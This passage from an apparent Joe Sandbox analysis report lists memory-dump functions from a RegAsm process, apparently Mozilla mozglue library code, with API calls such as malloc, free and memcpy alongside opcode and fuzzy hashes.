                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                        • API String ID: 3720097785-1285458680
                                                                                                                                                        • Opcode ID: a5944e704fcded0bc2ee709154de36bb3a15e67742f9f447d37298eb3083905a
                                                                                                                                                        • Instruction ID: d65457342f3411a46e3aad8a6095d72a8c77f21cda65b3ffb469a2d32ca0192f
                                                                                                                                                        • Opcode Fuzzy Hash: a5944e704fcded0bc2ee709154de36bb3a15e67742f9f447d37298eb3083905a
                                                                                                                                                        • Instruction Fuzzy Hash: C8519474610641CFD701CF18C094A9ABBF1BF4A318F68C28AD8594BBA2C734EC95CF96
                                                                                                                                                        Function 6C60BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C60BDEB
                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C60BE8F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2811501404-4108050209
                                                                                                                                                        • Opcode ID: 7a3bc4f6dd2e5467b6649bf6ceef49b3028e191d883688e0409a8c9c5be6f7f6
                                                                                                                                                        • Instruction ID: 8e782981e690506290c31c011dcd4ab580eef138ac14b439093a3bc2c3d9b781
                                                                                                                                                        • Opcode Fuzzy Hash: 7a3bc4f6dd2e5467b6649bf6ceef49b3028e191d883688e0409a8c9c5be6f7f6
                                                                                                                                                        • Instruction Fuzzy Hash: A041A071A09745CFC305CF28C581A9BB7E4AFCA388F008A1DF9856B651D730D959CB8A
                                                                                                                                                        Function 6C643CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C643D19
                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C643D6C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _errnomozalloc_abort
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 3471241338-2564639436
                                                                                                                                                        • Opcode ID: 99e5d2343fca08992893e9f431c3519c389d1a5ae340a6b20ec54fd45d4ea8dc
                                                                                                                                                        • Instruction ID: 9a9f32d2acb62fd2063ec0c5ed0dd7943b53f8a16bc3340b5ab3fa724a033e02
                                                                                                                                                        • Opcode Fuzzy Hash: 99e5d2343fca08992893e9f431c3519c389d1a5ae340a6b20ec54fd45d4ea8dc
                                                                                                                                                        • Instruction Fuzzy Hash: 4B113435E04698E7DB019F6ACC444EDB3B5EF87318F44D628DC499B602EB30A584C3A8
                                                                                                                                                        Function 6C666DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C666E22
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C666E3F
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C666E1D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Init_thread_footergetenv
                                                                                                                                                        • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                        • API String ID: 1472356752-1153589363
                                                                                                                                                        • Opcode ID: fc3adc53a15b649b581f668dcc457ee393fac460a8c95d93ca3c4eaccca8082a
                                                                                                                                                        • Instruction ID: ae73e8769a6c96da9af1fedb15e614985328cc5d6b7324059810adbacdf01906
                                                                                                                                                        • Opcode Fuzzy Hash: fc3adc53a15b649b581f668dcc457ee393fac460a8c95d93ca3c4eaccca8082a
                                                                                                                                                        • Instruction Fuzzy Hash: 53F0593460B240EBDB008B6AE890A8133715B03318F041365C44546FA1CB31F9A7CEFF
                                                                                                                                                        Function 6C619E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C619EEF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                        • String ID: Infinity$NaN
                                                                                                                                                        • API String ID: 1385522511-4285296124
                                                                                                                                                        • Opcode ID: dd52b94cde1b29a792ccdc9e8517010522c2c6826bbbb028088748073815c314
                                                                                                                                                        • Instruction ID: 7817e337b9105744c5a872ee67a6ce2b3685b3160af037203b7211829eb24c19
                                                                                                                                                        • Opcode Fuzzy Hash: dd52b94cde1b29a792ccdc9e8517010522c2c6826bbbb028088748073815c314
                                                                                                                                                        • Instruction Fuzzy Hash: 49F04971607241EBDB008F5AD885B9077F1B74731EF201A19C7450AB82E73565A6CABF
                                                                                                                                                        Function 6C616C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kdl,?,6C644B30,80000000,?,6C644AB7,?,6C6043CF,?,6C6042D2), ref: 6C616C42
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kdl,?,6C644B30,80000000,?,6C644AB7,?,6C6043CF,?,6C6042D2), ref: 6C616C58
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: moz_xmalloc$malloc
                                                                                                                                                        • String ID: 0Kdl
                                                                                                                                                        • API String ID: 1967447596-3895838284
                                                                                                                                                        • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                        • Instruction ID: be341555b8e8dcc6f9ef5b23ae930268ec48b2bfcd91c26486f264fcaf835f02
                                                                                                                                                        • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                        • Instruction Fuzzy Hash: 0AE026F6B5C1001A9B08987C9C0956E71C8CB153AA7044A35E823C2FC8FA94E480805D
                                                                                                                                                        Function 6C61BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C61BEE3
                                                                                                                                                        • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C61BEF5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$CallsDisableLoadThread
                                                                                                                                                        • String ID: cryptbase.dll
                                                                                                                                                        • API String ID: 4137859361-1262567842
                                                                                                                                                        • Opcode ID: ce44b48fd0aff60da0ceece0ff67b752f658f63a80fcf2f7f3b1df7e282e772d
                                                                                                                                                        • Instruction ID: 8f6a7aba4640631cd672e7b7e79dabbc44c819836efffb170fe0322c2e0d9e2b
                                                                                                                                                        • Opcode Fuzzy Hash: ce44b48fd0aff60da0ceece0ff67b752f658f63a80fcf2f7f3b1df7e282e772d
                                                                                                                                                        • Instruction Fuzzy Hash: 32D0A731189208FAC7006A558C0DB293B789786396F10C020F30554D52C7B09412CF7C
                                                                                                                                                        Function 6C65B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C65B2C9,?,?,?,6C65B127,?,?,?,?,?,?,?,?,?,6C65AE52), ref: 6C65B628
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C6590FF
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C659108
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C65B2C9,?,?,?,6C65B127,?,?,?,?,?,?,?,?,?,6C65AE52), ref: 6C65B67D
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C65B2C9,?,?,?,6C65B127,?,?,?,?,?,?,?,?,?,6C65AE52), ref: 6C65B708
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C65B127,?,?,?,?,?,?,?,?), ref: 6C65B74D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                        • Opcode ID: 29a63ab75aa782e076da42a6f61960a4b4f76d39b71335fc5e5d0d9ea78f516d
                                                                                                                                                        • Instruction ID: 7e2c86b142a8e541a5ca5b083dbcd57daed4287f6d1d3ed898f254c53a160210
                                                                                                                                                        • Opcode Fuzzy Hash: 29a63ab75aa782e076da42a6f61960a4b4f76d39b71335fc5e5d0d9ea78f516d
                                                                                                                                                        • Instruction Fuzzy Hash: 0051C271A053168FDB14CF18C98076EB7B5FFC5308FA5852DC85AAB750D731A824CBA9
                                                                                                                                                        Function 6C656E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C656EAB
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C656EFA
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C656F1E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C656F5C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                        • Opcode ID: 2493e3de538d034caac554a151c00adaa503ed93abd79d7c0caa9f8ae3e67d66
                                                                                                                                                        • Instruction ID: 9994dba90d33ab39a1498e214b5c6e8466ebd44ed83ebe8c7c8a58b119f5c957
                                                                                                                                                        • Opcode Fuzzy Hash: 2493e3de538d034caac554a151c00adaa503ed93abd79d7c0caa9f8ae3e67d66
                                                                                                                                                        • Instruction Fuzzy Hash: 54310971B115068FDB14CF2CC9806AE73FAEB85344FA04239D416D7751EB32E565C7A4
                                                                                                                                                        Function 6C66B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C610A4D), ref: 6C66B5EA
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C610A4D), ref: 6C66B623
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C610A4D), ref: 6C66B66C
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C610A4D), ref: 6C66B67F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1480856625-0
                                                                                                                                                        • Opcode ID: f011718a437416094a6b15622ea99ad5b098f65e1cab980bee52db7062c3dacd
                                                                                                                                                        • Instruction ID: 90bb080ca070a28e43e4950367c055c7f829fd1a9ff6e648e32620bc5f44868a
                                                                                                                                                        • Opcode Fuzzy Hash: f011718a437416094a6b15622ea99ad5b098f65e1cab980bee52db7062c3dacd
                                                                                                                                                        • Instruction Fuzzy Hash: 8831F671A01216CFDB10DF5AC88465AB7B5FFC1304F168629D806EBA01DB31E915CBE6
                                                                                                                                                        Function 6C63F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C63F611
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C63F623
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C63F652
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C63F668
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                        • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                        • Instruction ID: 24d8f337ccd67e1b724b0e1a658a3a7f9883f9fc6591ec767f9d2d1b08e6bc20
                                                                                                                                                        • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                        • Instruction Fuzzy Hash: 5D316171B00224AFD724CF1DCCC0A9B77B5EF94354F149979FA4A8BB04D632E9448BA9
                                                                                                                                                        Function 6C6526B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                        • Opcode ID: 22d8c10915a1089abb7025fdaadd258d994528d2c3d404de0e049a109cb19bea
                                                                                                                                                        • Instruction ID: f2f3227e13a1bca6ad32c385139139657eb7437fc117f199cc477aae5c85099f
                                                                                                                                                        • Opcode Fuzzy Hash: 22d8c10915a1089abb7025fdaadd258d994528d2c3d404de0e049a109cb19bea
                                                                                                                                                        • Instruction Fuzzy Hash: FFF0F9B27012016BE7109A18E8C495773A9EF4135CBB00035EA16D3B01E332F929C6AE